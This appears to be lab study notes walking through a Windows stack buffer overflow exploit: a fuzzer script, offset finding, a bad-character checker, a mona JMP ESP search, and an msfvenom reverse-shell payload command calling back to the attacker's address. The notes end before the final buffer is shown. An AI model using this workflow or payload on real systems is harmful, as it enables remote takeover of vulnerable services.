<aside> 💡 A Buffer Overflow Attack abuses a type of bug called a “buffer overflow”, in which a program writes past the end of a buffer and overwrites adjacent memory that should not have been modified, whether intentionally or unintentionally.

</aside>

Workflow

  1. Open/Attach the program to Immunity Debugger
  2. Run the fuzzing script and note the largest number of bytes sent when the application crashed. fuzzer.py (credits to TryHackMe):

```python
#!/usr/bin/env python3
import socket, time, sys

ip = "192.168.17.130" # Change this
port = 9999           # Change this
timeout = 5
prefix = ""           # Change if needed (e.g. a command the service expects before the input)

string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)   # read the banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)   # a timeout or reset here means the service stopped answering
  except OSError:    # covers socket.timeout and connection errors, but not Ctrl-C
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  string += 100 * "A"   # grow the input by 100 bytes per round
  time.sleep(1)
```
  3. Generate a cyclic pattern of that length with `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <BYTES_NUMBER>`
  4. Copy the pattern into the exploit.py script as the payload
  5. Re-open the application in Immunity Debugger and run the script
  6. Note the value that appears in EIP at the crash and feed it to `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <BYTES_NUMBER> -q <STRING_FOUND>`. This gives us the exact offset to EIP
  7. We can run a small test to confirm the offset: send a payload of exactly offset bytes followed by “BBBB”. If the offset is right, EIP will read 42424242 💪
  8. The next step is to check for bad characters (the bad-character string is included in the script). We append it after the padding that fills the offset, like so: `"A" * offset + badChars`
  9. Immunity Debugger pauses on the crash; follow the ESP address in the memory dump to see where the bad-character string landed

  10. Make sure every byte from 01 to FF is visible and unchanged in the dump; any byte that is missing or altered is a BAD CHARACTER and we need to write it down. I prefer to copy the entire thing from 01 to FF and compare it visually myself; others might use automation tools or `!mona compare`
  11. Now we’re going to find a jump point (an instruction that jumps to ESP) using this command: `!mona jmp -r esp -cpb "\x00"` (`-cpb` lists the bad characters the address must not contain)
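As an added helper (not code from the original notes or from TryHackMe), this automates the visual comparison described above and produces the byte-reversed address form used in the next step; the function names and the sample dump are constructed for the example.

```python
#!/usr/bin/env python3
# Added helper, not from the original notes or TryHackMe: builds the
# bad-character probe, diffs it against what was observed at ESP, and
# packs an address little-endian. The sample dump below is constructed.
import struct

def build_badchars(exclude=(0x00,)):
    """All bytes 0x01..0xFF except those already known to be bad.
    0x00 is excluded by default because it terminates C strings."""
    return bytes(b for b in range(1, 256) if b not in exclude)

def first_bad_char(sent, observed):
    """Return the first byte of `sent` that is missing or altered in
    `observed`, or None if the copy survived intact. Only the first
    mismatch is meaningful: a bad byte usually truncates or corrupts
    everything after it, so exclude it, resend, and compare again."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None

def pack_address(addr):
    """32-bit address in the byte-reversed (little-endian) form the
    notes show, e.g. 0x625014DF -> df 14 50 62."""
    return struct.pack("<I", addr)

if __name__ == "__main__":
    probe = build_badchars()
    # Constructed dump: pretend the service mangled 0x0a into 0x00
    dump = probe[:9] + b"\x00" + probe[10:]
    print(f"first bad char: {first_bad_char(probe, dump):#04x}")
    print(pack_address(0x625014DF).hex())
```

Once a bad character is found, pass it in `exclude`, resend the shorter probe and compare again until `first_bad_char` returns None.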

  12. We’re going to copy the address into our code, but written backwards (little-endian). For example, if the address is 625014DF it is used like this: `"\xdf\x14\x50\x62"`
  13. Our next step is to generate the payload with msfvenom: `msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00" -f c`. We take the payload into our code by copying the `unsigned char buf[]` part
  14. The last piece is to prepend NOPs. Since an encoder was likely used to generate the payload, it needs some space in memory to unpack itself. Set the padding variable to a string of 16 or more “No Operation” (`\x90`) bytes: `padding = "\x90" * 16`
  15. Finally, the buffer we send is built like so: